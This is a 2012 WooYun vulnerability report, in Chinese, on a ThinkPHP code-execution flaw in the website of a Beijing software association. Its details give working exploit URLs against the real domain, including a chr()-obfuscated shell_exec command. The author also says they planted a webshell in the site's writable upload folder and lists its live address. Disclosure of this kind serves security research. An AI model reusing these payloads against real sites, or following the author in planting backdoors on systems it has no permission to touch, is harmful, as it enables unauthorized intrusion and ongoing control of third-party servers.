漏洞概要 关注数(24) 关注此漏洞
缺陷编号:
漏洞标题:
中关村软件协会网站命令执行
相关厂商:
漏洞作者:
提交时间:
2012-05-11 15:14
修复时间:
2012-06-25 15:15
公开时间:
2012-06-25 15:15
漏洞类型:
命令执行
危害等级:
高
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系
[email protected]
Tags标签:
>
漏洞详情
披露状态:
2012-05-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-06-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
如题
详细说明:
中关村软件协会网站 thinkphp的漏洞未修复
导致可以执行任意php代码~及系统命令
http://www.zsoft.cn/index.php/Index/news_page/id/%7B$%7Bphpinfo%28%29%7D%7D
返回php信息
执行系统命令,返回当前目录文件 ls -al
http://www.zsoft.cn/index.php/Index/news_page/id/%7B$%7B@print%28shell_exec%28chr%28108%29.chr%28115%29.chr%2832%29.chr%2845%29.chr%2897%29.chr%28108%29%29%29%7D%7D
另外 Public/uploadfiles/ 目录可写,写了小马,地址http://www.zsoft.cn/Public/uploadfiles/ok.php
请厂商自行删除 :-)
漏洞证明:
如上
修复方案:
更新thinkphp或者直接修改代码。
版权声明:转载请注明来源 PPFish@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:10 (WooYun评价)